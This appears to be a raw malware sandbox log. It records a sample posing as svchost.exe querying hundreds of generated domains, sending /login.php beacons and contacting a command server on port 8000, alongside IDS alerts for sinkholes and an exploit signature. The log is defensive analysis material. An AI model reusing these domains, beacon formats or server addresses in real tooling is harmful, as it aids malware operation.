Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyvix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzydal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyfes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyjid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyzym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvysur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadydas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxeq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volycik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonykuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojydam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyrot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrysyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygytyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyvig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyleq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volybec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocybam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumydoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyvoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyreh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyloq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyxeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyxun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahydoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjet.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufylap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyfeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadykos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvylyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekytyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvypul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyfen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvycip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumygyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxytex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyref.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatypas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknownNetwork traffic detected: HTTP traffic on port 56923 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 56923
Source: unknownNetwork traffic detected: DNS query count 1002
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02654F80 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,2_2_02654F80
Source: global trafficTCP traffic: 192.168.2.9:56923 -> 106.15.232.163:8000
Source: global trafficDNS traffic detected: number of DNS queries: 1002
Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
Source: Joe Sandbox ViewIP Address: 64.190.63.136 64.190.63.136
Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.9:56913
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.9:56913
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.9:56870
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.9:56870
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.9:56860
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.9:56860
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.9:55973
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.9:55973
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.9:62630
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.9:49270
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731344868.1489616
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
